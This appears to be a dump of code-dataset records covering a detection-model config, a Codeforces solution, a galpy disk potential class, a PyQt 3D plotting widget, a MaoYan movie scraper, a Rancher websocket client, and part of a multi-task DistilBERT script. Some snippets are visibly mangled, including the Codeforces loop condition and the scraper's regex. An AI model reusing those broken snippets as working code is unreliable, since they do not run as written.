'/datasets/datasets_ramien/toy_exp/data'\n self.pp_name = os.path.join(toy_mode, 'train')\n self.pp_data_path = os.path.join(pp_root_dir, self.pp_name)\n self.pp_test_name = os.path.join(toy_mode, 'test')\n self.pp_test_data_path = os.path.join(pp_root_dir, self.pp_test_name)\n self.select_prototype_subset = None\n\n #########################\n # Data Loader #\n #########################\n\n # select modalities from preprocessed data\n self.channels = [0]\n self.n_channels = len(self.channels)\n\n # patch_size to be used for training. pre_crop_size is the patch_size before data augmentation.\n self.pre_crop_size_2D = [320, 320]\n self.patch_size_2D = [320, 320]\n\n self.patch_size = self.patch_size_2D if self.dim == 2 else self.patch_size_3D\n self.pre_crop_size = self.pre_crop_size_2D if self.dim == 2 else self.pre_crop_size_3D\n\n # ratio of free sampled batch elements before class balancing is triggered\n # (>0 to include \"empty\"/background patches.)\n self.batch_sample_slack = 0.2\n\n # set 2D network to operate in 3D images.\n self.merge_2D_to_3D_preds = False\n\n # feed +/- n neighbouring slices into channel dimension. set to None for no context.\n self.n_3D_context = None\n if self.n_3D_context is not None and self.dim == 2:\n self.n_channels *= (self.n_3D_context * 2 + 1)\n\n\n #########################\n # Architecture #\n #########################\n\n self.start_filts = 48 if self.dim == 2 else 18\n self.end_filts = self.start_filts * 4 if self.dim == 2 else self.start_filts * 2\n self.res_architecture = 'resnet50' # 'resnet101' , 'resnet50'\n self.norm = None # one of None, 'instance_norm', 'batch_norm'\n self.weight_decay = 0\n\n # one of 'xavier_uniform', 'xavier_normal', or 'kaiming_normal', None (=default = 'kaiming_uniform')\n self.weight_init = None\n\n #########################\n # Schedule / Selection #\n #########################\n\n self.num_epochs = 24\n self.num_train_batches = 100 if self.dim == 2 else 200\n self.batch_size = 20 if self.dim == 2 else 8\n\n self.do_validation = True\n # decide whether to validate on entire patient volumes (like testing) or sampled patches (like training)\n # the former is morge accurate, while the latter is faster (depending on volume size)\n self.val_mode = 'val_patient' # one of 'val_sampling' , 'val_patient'\n if self.val_mode == 'val_patient':\n self.max_val_patients = None # if 'None' iterates over entire val_set once.\n if self.val_mode == 'val_sampling':\n self.num_val_batches = 50\n\n #########################\n # Testing / Plotting #\n #########################\n\n # set the top-n-epochs to be saved for temporal averaging in testing.\n self.save_n_models = 5\n self.test_n_epochs = 5\n\n # set a minimum epoch number for saving in case of instabilities in the first phase of training.\n self.min_save_thresh = 0 if self.dim == 2 else 0\n\n self.report_score_level = ['patient', 'rois'] # choose list from 'patient', 'rois'\n self.class_dict = {1: 'benign', 2: 'malignant'} # 0 is background.\n self.patient_class_of_interest = 2 # patient metrics are only plotted for one class.\n self.ap_match_ious = [0.1] # list of ious to be evaluated for ap-scoring.\n\n self.model_selection_criteria = ['benign_ap', 'malignant_ap'] # criteria to average over for saving epochs.\n self.min_det_thresh = 0.1 # minimum confidence value to select predictions for evaluation.\n\n # threshold for clustering predictions together (wcs = weighted cluster scoring).\n # needs to be >= the expected overlap of predictions coming from one model (typically NMS threshold).\n # if too high, preds of the same object are separate clusters.\n self.wcs_iou = 1e-5\n\n self.plot_prediction_histograms = True\n self.plot_stat_curves = False\n\n #########################\n # Data Augmentation #\n #########################\n\n self.da_kwargs={\n 'do_elastic_deform': True,\n 'alpha':(0., 1500.),\n 'sigma':(30., 50.),\n 'do_rotation':True,\n 'angle_x': (0., 2 * np.pi),\n 'angle_y': (0., 0),\n 'angle_z': (0., 0),\n 'do_scale': True,\n 'scale':(0.8, 1.1),\n 'random_crop':False,\n 'rand_crop_dist': (self.patch_size[0] / 2. - 3, self.patch_size[1] / 2. - 3),\n 'border_mode_data': 'constant',\n 'border_cval_data': 0,\n 'order_data': 1\n }\n\n if self.dim == 3:\n self.da_kwargs['do_elastic_deform'] = False\n self.da_kwargs['angle_x'] = (0, 0.0)\n self.da_kwargs['angle_y'] = (0, 0.0) #must be 0!!\n self.da_kwargs['angle_z'] = (0., 2 * np.pi)\n\n\n #########################\n # Add model specifics #\n #########################\n\n {'detection_unet': self.add_det_unet_configs,\n 'mrcnn': self.add_mrcnn_configs,\n 'ufrcnn': self.add_mrcnn_configs,\n 'ufrcnn_surrounding': self.add_mrcnn_configs,\n 'retina_net': self.add_mrcnn_configs,\n 'retina_unet': self.add_mrcnn_configs,\n 'prob_detector': self.add_mrcnn_configs,\n }[self.model]()\n\n\n def add_det_unet_configs(self):\n\n self.learning_rate = [1e-4] * self.num_epochs\n\n # aggregation from pixel perdiction to object scores (connected component). One of ['max', 'median']\n self.aggregation_operation = 'max'\n\n # max number of roi candidates to identify per image (slice in 2D, volume in 3D)\n self.n_roi_candidates = 3 if self.dim == 2 else 8\n\n # loss mode: either weighted cross entropy ('wce'), batch-wise dice loss ('dice), or the sum of both ('dice_wce')\n self.seg_loss_mode = 'dice_wce'\n\n # if <1, false positive predictions in foreground are penalized less.\n self.fp_dice_weight = 1 if self.dim == 2 else 1\n\n self.wce_weights = [1, 1, 1]\n self.detection_min_confidence = self.min_det_thresh\n\n # if 'True', loss distinguishes all classes, else only foreground vs. background (class agnostic).\n self.class_specific_seg_flag = True\n self.num_seg_classes = 3 if self.class_specific_seg_flag else 2\n self.head_classes = self.num_seg_classes\n\n def add_mrcnn_configs(self):\n\n # learning rate is a list with one entry per epoch.\n self.learning_rate = [1e-4] * self.num_epochs\n\n # disable mask head loss. (e.g. if no pixelwise annotations available)\n self.frcnn_mode = False\n\n # disable the re-sampling of mask proposals to original size for speed-up.\n # since evaluation is detection-driven (box-matching) and not instance segmentation-driven (iou-matching),\n # mask-outputs are optional.\n self.return_masks_in_val = True\n self.return_masks_in_test = False\n\n # set number of proposal boxes to plot after each epoch.\n self.n_plot_rpn_props = 5 if self.dim == 2 else 30\n\n # number of classes for head networks: n_foreground_classes + 1 (background)\n self.head_classes = 3\n\n # seg_classes hier refers to the first stage classifier (RPN)\n self.num_seg_classes = 2 # foreground vs. background\n\n # feature map strides per pyramid level are inferred from architecture.\n self.backbone_strides = {'xy': [4, 8, 16, 32], 'z': [1, 2, 4, 8]}\n\n # anchor scales are chosen according to expected object sizes in data set. Default uses only one anchor scale\n # per pyramid level. (outer list are pyramid levels (corresponding to BACKBONE_STRIDES), inner list are scales per level.)\n self.rpn_anchor_scales = {'xy': [[8], [16], [32], [64]], 'z': [[2], [4], [8], [16]]}\n\n # choose which pyramid levels to extract features from: P2: 0, P3: 1, P4: 2, P5: 3.\n self.pyramid_levels = [0, 1, 2, 3]\n\n # number of feature maps in rpn. typically lowered in 3D to save gpu-memory.\n self.n_rpn_features = 512 if self.dim == 2 else 128\n\n # anchor ratios and strides per position in feature maps.\n self.rpn_anchor_ratios = [0.5, 1, 2]\n self.rpn_anchor_stride = 1\n\n # Threshold for first stage (RPN) non-maximum suppression (NMS): LOWER == HARDER SELECTION\n self.rpn_nms_threshold = 0.7 if self.dim == 2 else 0.7\n\n # loss sampling settings.\n self.rpn_train_anchors_per_image = 2 #per batch element\n self.train_rois_per_image = 2 #per batch element\n self.roi_positive_ratio = 0.5\n self.anchor_matching_iou = 0.7\n\n # factor of top-k candidates to draw from per negative sample (stochastic-hard-example-mining).\n # poolsize to draw top-k candidates from will be shem_poolsize * n_negative_samples.\n self.shem_poolsize = 10\n\n self.pool_size = (7, 7) if self.dim == 2 else (7, 7, 3)\n self.mask_pool_size = (14, 14) if self.dim == 2 else (14, 14, 5)\n self.mask_shape = (28, 28) if self.dim == 2 else (28, 28, 10)\n\n self.rpn_bbox_std_dev = np.array([0.1, 0.1, 0.1, 0.2, 0.2, 0.2])\n self.bbox_std_dev = np.array([0.1, 0.1, 0.1, 0.2, 0.2, 0.2])\n self.window = np.array([0, 0, self.patch_size[0], self.patch_size[1]])\n self.scale = np.array([self.patch_size[0], self.patch_size[1], self.patch_size[0], self.patch_size[1]])\n\n if self.dim == 2:\n self.rpn_bbox_std_dev = self.rpn_bbox_std_dev[:4]\n self.bbox_std_dev = self.bbox_std_dev[:4]\n self.window = self.window[:4]\n self.scale = self.scale[:4]\n\n # pre-selection in proposal-layer (stage 1) for NMS-speedup. applied per batch element.\n self.pre_nms_limit = 3000 if self.dim == 2 else 6000\n\n # n_proposals to be selected after NMS per batch element. too high numbers blow up memory if \"detect_while_training\" is True,\n # since proposals of the entire batch are forwarded through second stage in as one \"batch\".\n self.roi_chunk_size = 800 if self.dim == 2 else 600\n self.post_nms_rois_training = 500 if self.dim == 2 else 75\n self.post_nms_rois_inference = 500\n\n # Final selection of detections (refine_detections)\n self.model_max_instances_per_batch_element = 10 if self.dim == 2 else 30 # per batch element and class.\n self.detection_nms_threshold = 1e-5 # needs to be > 0, otherwise all predictions are one cluster.\n self.model_min_confidence = 0.1\n\n if self.dim == 2:\n self.backbone_shapes = np.array(\n [[int(np.ceil(self.patch_size[0] / stride)),\n int(np.ceil(self.patch_size[1] / stride))]\n for stride in self.backbone_strides['xy']])\n else:\n self.backbone_shapes = np.array(\n [[int(np.ceil(self.patch_size[0] / stride)),\n int(np.ceil(self.patch_size[1] / stride)),\n int(np.ceil(self.patch_size[2] / stride_z))]\n for stride, stride_z in zip(self.backbone_strides['xy'], self.backbone_strides['z']\n )])\n if self.model == 'ufrcnn':\n self.operate_stride1 = True\n self.class_specific_seg_flag = True\n self.num_seg_classes = 3 if self.class_specific_seg_flag else 2\n self.frcnn_mode = True\n\n if self.model == 'retina_net' or self.model == 'retina_unet' or self.model == 'prob_detector':\n # implement extra anchor-scales according to retina-net publication.\n self.rpn_anchor_scales['xy'] = [[ii[0], ii[0] * (2 ** (1 / 3)), ii[0] * (2 ** (2 / 3))] for ii in\n self.rpn_anchor_scales['xy']]\n self.rpn_anchor_scales['z'] = [[ii[0], ii[0] * (2 ** (1 / 3)), ii[0] * (2 ** (2 / 3))] for ii in\n self.rpn_anchor_scales['z']]\n self.n_anchors_per_pos = len(self.rpn_anchor_ratios) * 3\n\n self.n_rpn_features = 256 if self.dim == 2 else 64\n\n # pre-selection of detections for NMS-speedup. per entire batch.\n self.pre_nms_limit = 10000 if self.dim == 2 else 50000\n\n # anchor matching iou is lower than in Mask R-CNN according to https://arxiv.org/abs/1708.02002\n self.anchor_matching_iou = 0.5\n\n # if 'True', seg loss distinguishes all classes, else only foreground vs. background (class agnostic).\n self.num_seg_classes = 3 if self.class_specific_seg_flag else 2\n\n if self.model == 'retina_unet':\n self.operate_stride1 = True\n","sub_path":"experiments/toy_exp/configs.py","file_name":"configs.py","file_ext":"py","file_size_in_byte":15348,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"580713425","text":"def solve():\r\n n = int(input())\r\n left = 0\r\n right = n-1\r\n a = list(map(int,input().split()))\r\n\r\n while (left=0) and left<=right:\r\n if left==right:\r\n print(a[left],end='')\r\n else:\r\n if left=0:\r\n print(a[right],' ',end='')\r\n left+=1\r\n right-=1\r\n print()\r\n\r\nif __name__ == '__main__':\r\n t = int(input())\r\n for _ in range(t):\r\n solve()\r\n","sub_path":"codeforces/1462/A.py","file_name":"A.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"307489377","text":"###############################################################################\n# CosmphiDiskPotential: cos(mphi) potential\n###############################################################################\nimport numpy\n\nfrom ..util import conversion\nfrom .planarPotential import planarPotential\n\n_degtorad = numpy.pi / 180.0\n\n\nclass CosmphiDiskPotential(planarPotential):\n \"\"\"Class that implements the disk potential\n\n .. math::\n\n \\\\Phi(R,\\\\phi) = \\\\mathrm{amp}\\\\,\\\\phi_0\\\\,\\\\,\\\\cos\\\\left[m\\\\,(\\\\phi-\\\\phi_b)\\\\right]\\\\times \\\\begin{cases}\n \\\\left(\\\\frac{R}{R_1}\\\\right)^p\\\\,, & \\\\text{for}\\\\ R \\\\geq R_b\\\\\\\\\n \\\\left[2-\\\\left(\\\\frac{R_b}{R}\\\\right)^p\\\\right]\\\\times\\\\left(\\\\frac{R_b}{R_1}\\\\right)^p\\\\,, & \\\\text{for}\\\\ R\\\\leq R_b.\n \\\\end{cases}\n\n This potential can be grown between :math:`t_{\\\\mathrm{form}}` and :math:`t_{\\\\mathrm{form}}+T_{\\\\mathrm{steady}}` in a similar way as DehnenBarPotential by wrapping it with a DehnenSmoothWrapperPotential\n\n \"\"\"\n\n def __init__(\n self,\n amp=1.0,\n phib=25.0 * _degtorad,\n p=1.0,\n phio=0.01,\n m=4,\n r1=1.0,\n rb=None,\n cp=None,\n sp=None,\n ro=None,\n vo=None,\n ):\n \"\"\"\n NAME:\n\n __init__\n\n PURPOSE:\n\n initialize an cosmphi disk potential\n\n INPUT:\n\n amp= amplitude to be applied to the potential (default:\n 1.), degenerate with phio below, but kept for overall\n consistency with potentials\n\n m= cos( m * (phi - phib) ), integer\n\n p= power-law index of the phi(R) = (R/Ro)^p part\n\n r1= (1.) normalization radius for the amplitude (can be Quantity); amp x phio is only the potential at (R,phi) = (r1,pib) when r1 > rb; otherwise more complicated\n\n rb= (None) if set, break radius for power-law: potential R^p at R > Rb, R^-p at R < Rb, potential and force continuous at Rb\n\n\n Either:\n\n a) phib= angle (in rad; default=25 degree; or can be Quantity)\n\n phio= potential perturbation (in terms of phio/vo^2 if vo=1 at Ro=1; or can be Quantity with units of velocity-squared)\n\n b) cp, sp= m * phio * cos(m * phib), m * phio * sin(m * phib); can be Quantity with units of velocity-squared)\n\n OUTPUT:\n\n (none)\n\n HISTORY:\n\n 2011-10-27 - Started - Bovy (IAS)\n\n 2017-09-16 - Added break radius rb - Bovy (UofT)\n\n \"\"\"\n planarPotential.__init__(self, amp=amp, ro=ro, vo=vo)\n phib = conversion.parse_angle(phib)\n r1 = conversion.parse_length(r1, ro=self._ro)\n rb = conversion.parse_length(rb, ro=self._ro)\n phio = conversion.parse_energy(phio, vo=self._vo)\n cp = conversion.parse_energy(cp, vo=self._vo)\n sp = conversion.parse_energy(sp, vo=self._vo)\n # Back to old definition\n self._r1p = r1**p\n self._amp /= self._r1p\n self.hasC = False\n self._m = int(m) # make sure this is an int\n if cp is None or sp is None:\n self._phib = phib\n self._mphio = phio * self._m\n else:\n self._mphio = numpy.sqrt(cp * cp + sp * sp)\n self._phib = numpy.arctan(sp / cp) / self._m\n if m < 2.0 and cp < 0.0:\n self._phib = numpy.pi + self._phib\n self._p = p\n if rb is None:\n self._rb = 0.0\n self._rbp = 1.0 # never used, but for p < 0 general expr fails\n self._rb2p = 1.0\n else:\n self._rb = rb\n self._rbp = self._rb**self._p\n self._rb2p = self._rbp**2.0\n self._mphib = self._m * self._phib\n self.hasC = True\n self.hasC_dxdv = True\n\n def _evaluate(self, R, phi=0.0, t=0.0):\n \"\"\"\n NAME:\n _evaluate\n PURPOSE:\n evaluate the potential at R,phi,t\n INPUT:\n R - Galactocentric cylindrical radius\n phi - azimuth\n t - time\n OUTPUT:\n Phi(R,phi,t)\n HISTORY:\n 2011-10-19 - Started - Bovy (IAS)\n \"\"\"\n if R < self._rb:\n return (\n self._mphio\n / self._m\n * numpy.cos(self._m * phi - self._mphib)\n * self._rbp\n * (2.0 * self._r1p - self._rbp / R**self._p)\n )\n else:\n return (\n self._mphio\n / self._m\n * R**self._p\n * numpy.cos(self._m * phi - self._mphib)\n )\n\n def _Rforce(self, R, phi=0.0, t=0.0):\n \"\"\"\n NAME:\n _Rforce\n PURPOSE:\n evaluate the radial force for this potential\n INPUT:\n R - Galactocentric cylindrical radius\n phi - azimuth\n t - time\n OUTPUT:\n the radial force\n HISTORY:\n 2011-10-19 - Written - Bovy (IAS)\n \"\"\"\n if R < self._rb:\n return (\n -self._p\n * self._mphio\n / self._m\n * self._rb2p\n / R ** (self._p + 1.0)\n * numpy.cos(self._m * phi - self._mphib)\n )\n else:\n return (\n -self._p\n * self._mphio\n / self._m\n * R ** (self._p - 1.0)\n * numpy.cos(self._m * phi - self._mphib)\n )\n\n def _phitorque(self, R, phi=0.0, t=0.0):\n \"\"\"\n NAME:\n _phitorque\n PURPOSE:\n evaluate the azimuthal torque for this potential\n INPUT:\n R - Galactocentric cylindrical radius\n phi - azimuth\n t - time\n OUTPUT:\n the azimuthal torque\n HISTORY:\n 2011-10-19 - Written - Bovy (IAS)\n \"\"\"\n if R < self._rb:\n return (\n self._mphio\n * numpy.sin(self._m * phi - self._mphib)\n * self._rbp\n * (2.0 * self._r1p - self._rbp / R**self._p)\n )\n else:\n return self._mphio * R**self._p * numpy.sin(self._m * phi - self._mphib)\n\n def _R2deriv(self, R, phi=0.0, t=0.0):\n if R < self._rb:\n return (\n -self._p\n * (self._p + 1.0)\n * self._mphio\n / self._m\n * self._rb2p\n / R ** (self._p + 2.0)\n * numpy.cos(self._m * phi - self._mphib)\n )\n else:\n return (\n self._p\n * (self._p - 1.0)\n / self._m\n * self._mphio\n * R ** (self._p - 2.0)\n * numpy.cos(self._m * phi - self._mphib)\n )\n\n def _phi2deriv(self, R, phi=0.0, t=0.0):\n if R < self._rb:\n return (\n -self._m\n * self._mphio\n * numpy.cos(self._m * phi - self._mphib)\n * self._rbp\n * (2.0 * self._r1p - self._rbp / R**self._p)\n )\n else:\n return (\n -self._m\n * self._mphio\n * R**self._p\n * numpy.cos(self._m * phi - self._mphib)\n )\n\n def _Rphideriv(self, R, phi=0.0, t=0.0):\n if R < self._rb:\n return (\n -self._p\n * self._mphio\n / self._m\n * self._rb2p\n / R ** (self._p + 1.0)\n * numpy.sin(self._m * phi - self._mphib)\n )\n else:\n return (\n -self._p\n * self._mphio\n * R ** (self._p - 1.0)\n * numpy.sin(self._m * phi - self._mphib)\n )\n\n\nclass LopsidedDiskPotential(CosmphiDiskPotential):\n \"\"\"Class that implements the disk potential\n\n .. math::\n\n \\\\Phi(R,\\\\phi) = \\\\mathrm{amp}\\\\,\\\\phi_0\\\\,\\\\left(\\\\frac{R}{R_1}\\\\right)^p\\\\,\\\\cos\\\\left(\\\\phi-\\\\phi_b\\\\right)\n\n Special case of CosmphiDiskPotential with m=1; see documentation for CosmphiDiskPotential\n \"\"\"\n\n def __init__(\n self,\n amp=1.0,\n phib=25.0 * _degtorad,\n p=1.0,\n phio=0.01,\n r1=1.0,\n cp=None,\n sp=None,\n ro=None,\n vo=None,\n ):\n CosmphiDiskPotential.__init__(\n self, amp=amp, phib=phib, p=p, phio=phio, m=1.0, cp=cp, sp=sp, ro=ro, vo=vo\n )\n self.hasC = True\n self.hasC_dxdv = True\n","sub_path":"galpy/potential/CosmphiDiskPotential.py","file_name":"CosmphiDiskPotential.py","file_ext":"py","file_size_in_byte":8553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"562347113","text":"import matplotlib\nmatplotlib.use(\"Qt5Agg\") # 声明使用QT5\nfrom matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas\nfrom matplotlib.backends.backend_qt5 import NavigationToolbar2QT as NavigationToolbar\nfrom matplotlib.figure import Figure\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.image as mpimg\nfrom PyQt5 import QtCore, QtWidgets\nimport numpy as np\nimport sys\nimport cv2\n\n\nclass MyD3DCanvas(FigureCanvas):\n\tdef __init__(self, parent=None, width=5, height=4, dpi=100):\n\t\t\n\t\tplt.rcParams['font.family'] = ['SimHei']\n\t\tplt.rcParams['axes.unicode_minus'] = False\n\t\t\n\t\tself.fig = Figure(figsize=(width, height), dpi=dpi)\n\t\t\n\t\tsuper().__init__(self.fig)\n\t\tself.setParent(parent)\n\t\t\n\t\tself.setSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)\n\t\tself.updateGeometry()\n\t\t\n\tdef start_static_plot(self, picture, flag='gray'):\n\t\t\n\t\tif flag == 'gray':\n\t\t\t\n\t\t\tself.fig.suptitle('灰度图像')\n\t\t\tself.fig.figimage(picture, resize=True)\n\t\t\t\n\t\telif flag == 'D3D':\n\t\t\t\n\t\t\tself.fig.suptitle('3D图像')\n\t\t\tself.axes = self.fig.add_subplot(1, 1, 1, projection='3d')\n\t\t\tself.D3D = picture.copy()\n\t\t\tself.axes.set_xticks(np.arange(0, 80, 13))\n\t\t\tself.axes.set_xticklabels(np.arange(0, 601, 100))\n\t\t\tself.axes.set_yticks(np.arange(0, 61, 12))\n\t\t\tself.axes.set_yticklabels(np.arange(0, 501, 100))\n\t\t\tself.pictureheight3D, self.picturewidth3D = self.D3D.shape[:2]\n\t\t\tself.x3D = np.arange(0, self.picturewidth3D, 1)\n\t\t\tself.y3D = np.arange(0, self.pictureheight3D, 1)\n\t\t\tself.x3D, self.y3D = np.meshgrid(self.x3D, self.y3D)\n\t\t\tself.D3D = cv2.flip(self.D3D, 0)\n\t\t\tprint(self.pictureheight3D, self.picturewidth3D)\n\t\t\tself.axes.plot_surface(self.x3D, self.y3D, self.D3D[self.y3D, self.x3D], rstride=2, cstride=2,\n\t\t\t cmap='rainbow')\n\t\t\n\t\telif flag == 'contour':\n\t\t\t\n\t\t\tself.fig.suptitle('等温线图像')\n\t\t\tself.axes = self.fig.add_subplot(1, 1, 1)\n\t\t\tself.contour = picture.copy()\n\t\t\tself.pictureheight, self.picturewidth = self.contour.shape[:2]\n\t\t\tself.xcontour = np.arange(0, self.picturewidth, 1)\n\t\t\tself.ycontour = np.arange(0, self.pictureheight, 1)\n\t\t\tself.xcontour, self.ycontour = np.meshgrid(self.xcontour, self.ycontour)\n\t\t\tself.contour = cv2.flip(self.contour, 0)\n\t\t\tself.contourline = self.axes.contour(self.xcontour, self.ycontour, self.contour[self.ycontour, self.xcontour],\n\t\t\t 10, colors='black', linewidths=1)\n\t\t\tself.axes.clabel(self.contourline, inline=True, inline_spacing=5, fontsize=10, fmt='%.1f')\n\t\t\tself.axes.contourf(self.xcontour, self.ycontour, self.contour[self.ycontour, self.xcontour], 10, cmap='rainbow')\n\t\t\t\n\t\t\n\t\telif flag == 'original':\n\t\t\t\n\t\t\tself.fig.suptitle('原始图像')\n\t\t\tself.fig.figimage(picture, resize=True)\n\t\t\nclass MyD3DWidget(QtWidgets.QDialog):\n\t\n\tdef __init__(self, parent=None, picture=None):\n\t\tsuper().__init__(parent)\n\t\tself.picture = picture\n\t\tself.initUi()\n\t\tself.connectEmit()\n\t\tself.retranslateUi()\n\t\t\n\tdef initUi(self):\n\n\t\tself.layout = QtWidgets.QVBoxLayout(self)\n\t\tself.mpl = MyD3DCanvas(self)\n\t\tself.mpl.resize(QtCore.QSize(720, 576))\n\t\tself.mpl.setMinimumSize(QtCore.QSize(720, 576))\n\t\tself.mpl.setMaximumSize(QtCore.QSize(720, 576))\n\t\t\n\t\tself.layout.addWidget(self.mpl)\n\t\t\n\t\tself.toolbar = NavigationToolbar(self.mpl, self)\n\t\tself.layout.addWidget(self.toolbar)\n\t\t\n\t\t'''\n\t\tself.horizontalLayout = QtWidgets.QHBoxLayout(self)\n\t\tself.save_button = QtWidgets.QPushButton(self)\n\t\tself.save_button.setObjectName(\"save\")\n\t\tself.horizontalLayout.addWidget(self.save_button)\n\t\tself.enlarge_button = QtWidgets.QPushButton(self)\n\t\tself.enlarge_button.setObjectName(\"enlarge\")\n\t\tself.horizontalLayout.addWidget(self.enlarge_button)\n\t\tself.return_button = QtWidgets.QPushButton(self)\n\t\tself.return_button.setObjectName(\"pull\")\n\t\tself.horizontalLayout.addWidget(self.return_button)\n\t\tself.layout.addLayout(self.horizontalLayout)\n\t\t'''\n\t\t\n\tdef connectEmit(self):\n\t\t# self.save_button.clicked.connect(self.save_figure)\n\t\tpass\n\t\t\n\tdef retranslateUi(self):\n\t\t\n\t\t__translation = QtCore.QCoreApplication.translate\n\t\tself.setWindowTitle(__translation(' ', '3D图像'))\n\t\t\n\t\t'''\n\t\tself.save_button.setText(__translation(' ', '保存'))\n\t\tself.enlarge_button.setText(__translation(' ', '放大'))\n\t\tself.return_button.setText(__translation(' ', '还原'))\n\t\t'''\n\t\t\n\t\t'''\n\tdef save_figure(self):\n\t\t\n\t\tself.save_widget = QtWidgets.QFileDialog()\n\t\tself.save_widget.setAcceptMode(QtWidgets.QFileDialog.AcceptSave)\n\t\tself.save_widget.setWindowTitle('请选择保存路径')\n\t\tself.save_widget.setNameFilter('image files(*.png)')\n\t\t\n\t\tif self.save_widget.exec():\n\t\t\tself.save_name = self.save_widget.selectedFiles()[0]\n\t\t\tself.save_url = self.save_widget.selectedUrls()\n\t\t\tprint(self.save_url, self.save_name)\n\t\t\tself.mpl.fig.savefig(self.save_name)\n\t\telse:\n\t\t\treturn\n\t\t'''\nif __name__ == '__main__':\n\t\n\tapp = QtWidgets.QApplication(sys.argv)\n\timage = mpimg.imread('mask.png')\n\tui = MyD3DWidget(picture=image)\n\tui.show()\n\tsys.exit(app.exec())\n\t","sub_path":"D3DWindow.py","file_name":"D3DWindow.py","file_ext":"py","file_size_in_byte":5017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"266670146","text":"#coding = utf-8\nimport re\nimport json\nfrom selenium import webdriver\nimport time\n\n\ndef get_one_page(url):\n\toption = webdriver.ChromeOptions()\n\toption.add_argument(\"headless\")\n\tbrowser = webdriver.Chrome(chrome_options=option)\n\tbrowser.get(url)\n\treturn browser.page_source\n\ndef parse_one_page(html):\n\tpattern = re.compile('
    .*?board-index.*?>(\\d+).*?data-src=\"(.*?)\".*?alt=\"(.*?)\".*?class=\"star\">(.*?)

    .*?\"releasetime\">(.*?)

    .*?\"integer\">(.*?)<.*?\"fraction\">(.*?).*?
    ',re.S)\n\n\titems = re.findall(pattern,html)\n\n\tfor item in items:\n\t\tyield{\n\t\t\t \"index\":item[0].strip(),\n\t\t\t \"image\": item[1].strip(),\n\t\t\t \"title\":item[2].strip(),\n\t\t\t \"actor\":item[3].strip()[3:],\n\t\t\t \"time\":item[4].strip()[5:],\n\t\t\t \"score\":item[5]+item[6]\n\t\t}\n\ndef write_to_file(content,filename):\n\twith open(filename,'a',encoding='UTF-8') as file:\n\t\tfile.write(json.dumps(content,ensure_ascii=False)+'\\n')\n\t\tfile.close()\ndef main(offset):\n\n\turl = 'http://maoyan.com/board/4?offset=' + str(offset)\n\thtml = get_one_page(url)\n\tfor item in parse_one_page(html):\n\t\tprint(item)\n\t\twrite_to_file(item,\"Results\\\\MaoYanTop100SP.txt\")\n\nif __name__ == '__main__':\n\tstart_time = time.time()\n\tfor i in range(10):\n\t\tmain(i*10)\n\telapsed = time.time()-start_time\n\tprint(\"RuningTime:\",elapsed,\"s\")","sub_path":"MaoYanspiderSingleProcesses.py","file_name":"MaoYanspiderSingleProcesses.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"345959490","text":"from base64 import b64encode\ntry:\n # Python 3\n from urllib.parse import urljoin\nexcept (ImportError) as e:\n # Python 2\n from urlparse import urljoin\n\nimport websocket\n\nfrom .common import CattleObject\n\n\nclass Subscribe(CattleObject):\n object_url = 'subscribe'\n\n def __init__(self, environment, event_names='resource.change', on_open = None, on_message = None, on_error = None, on_close = None):\n self.env = environment\n self.event_names = event_names\n self.service_url = '{}?eventNames={}'.format(self.object_url, self.event_names)\n\n # Callbacks\n self.on_open = on_open\n self.on_message = on_message\n self.on_error = on_error\n self.on_close = on_close\n\n # Websocket\n url = urljoin(self.env.endpoint, self.service_url)\n url = url.replace('http://', 'ws://').replace('https://', 'wss://')\n self.ws = websocket.WebSocketApp(url,\n header=[\"Authorization: Basic \" + b64encode(b':'.join(self.env.auth)).strip()],\n on_message = self.on_message,\n on_error = self.on_error,\n on_close = self.on_close,\n on_open=self.on_open)\n\n def connect(self, ping_interval=5):\n self.ws.run_forever(ping_interval=ping_interval)\n\n def disconnect(self):\n self.ws.close()\n","sub_path":"pyranch/subscribe.py","file_name":"subscribe.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"65206095","text":"# The pre-training model, e.g. Bert, trains a substantial model as basis. \n# The fundamental model contains most knowledge of natural language.\n# Then, based on these knowledge, new structures are added and fine-tuned for\n# different kinds of tasks.\n# Because most knowledge is stored in the fundamental structure rather than these extra \n# structures, we try to fine-tune multiple downstream tasks together.\n# Target: A fundamental pre-training model can support multiple downstream tasks.\n# Fundamental model: Bert.\n# Downstream tasks (GLUE): \n# CoLA, SST-2, MRPC, STS-B, QQP, MNLI, QNLI, RTE, WNLI.\n# ulimit -n 2000\n\nimport os\nimport sys\nimport logging\nimport torch\nimport time\nimport numpy as np\nfrom torch import nn\nfrom downstream_distilbert import SequenceClassification\nfrom data import GlueDataArgs, DataIterator, ComputeMetrics\n# from transformers import BertConfig, BertTokenizer, BertModel\nfrom transformers import DistilBertConfig, DistilBertTokenizer, DistilBertModel\nfrom transformers import (\n # glue_compute_metrics,\n glue_tasks_num_labels\n )\n \n \nlogger = logging.getLogger(__name__)\n\n# Hyperparameters\nepochs = 20\nmodel_name=\"sst2-nmli-sstb-qnli-distilbert-frozen-mtb-3\"\nbatch_size = [44, 256, 5, 71]\nbs = 256\nbatch_size_val = [218, 200, 100, 190]\nlearning_rate_0 = 0.0001\nlearning_rate_1 = 0.2\neval_interval = 3000\nfrozen = 10000 # set 0 to prevent frozen the main model\nbert_path=\"/home/nsccgz_jiangsu/bert-models/distilbert-base-cased\"\ncache_dir = os.path.join(\"/home/nsccgz_jiangsu/djs/output\", model_name, \"cache\")\nmodel_save_dir = os.path.join(\"/home/nsccgz_jiangsu/djs/output\", model_name,\"saved_model\")\n\n\n# Define what tasks to train\ntasks = [\"SST-2\", \"MNLI\", \"STS-B\", \"QNLI\"]\n# Train 67k 393k 7k 108k\n# dev 872 20k 1.5k 